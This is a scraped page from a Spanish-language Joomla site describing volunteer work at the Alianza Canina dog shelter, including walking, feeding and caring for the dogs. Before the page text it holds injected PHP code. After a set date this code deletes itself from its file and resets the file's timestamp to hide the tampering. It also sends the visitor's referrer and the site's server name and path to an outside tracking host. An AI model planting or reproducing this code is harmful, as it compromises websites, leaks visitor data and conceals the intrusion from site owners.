check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732081){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Voluntariado

UniversoPyme

universopyme

Inscripción a boletín electrónico











Voluntariado PDF Imprimir E-mail

El voluntariado es una actividad, donde las personas deciden por voluntad propia, involucrarse en actividades de su comunidad, para mejorarla. Por definición, los voluntarios no cobran por su trabajo.

Existen diferentes motivaciones que llevan a las personas a dedicar parte de su tiempo a realizar un trabajo no remunerado. La satisfacción que se obtiene al sacrificar una parte de sí mismo, en favor de otros, no se compara con nada. Es muy cierto que cuanto más grande sea nuestra riqueza interior, más felicidad traemos a nuestras vidas y las de los que nos rodean.

Para Alianza Canina, el trabajo de los voluntarios es fundamental. Sin ellos, no podríamos atender a nuestros perritos como se debe.

El trabajo de un voluntario en Alianza Canina consiste en asistir al refugio para pasear a los perros, convivir con ellos, alimentarlos, limpiar sus jaulas, pero sobre todo brindarles mucho amor.

Si eres amante de los animales, si sufres cuando ves perros abandonados en la calle, perros enfermos y en pésimas condiciones, entonces Tú puedes ser un voluntario en Alianza Canina. Acompáñanos a marcar la diferencia en nuestra comunidad.  ¡Te esperamos!

 

 

Esto es colaboración!!!! Gracias Regina!!!

 


cartulinaregina

Última actualización el Viernes, 06 de Mayo de 2011 20:44
 

Contador de Casos de Éxito

Contador_arriba
perrosarescatados
contador_izq0_cero6_seis7_siete0_cerocontador_izq

 

Patrocinadores

petmedical

Logo_delaCalle_a_la_Casa_

royal_canin

Logo_Croquetero

bus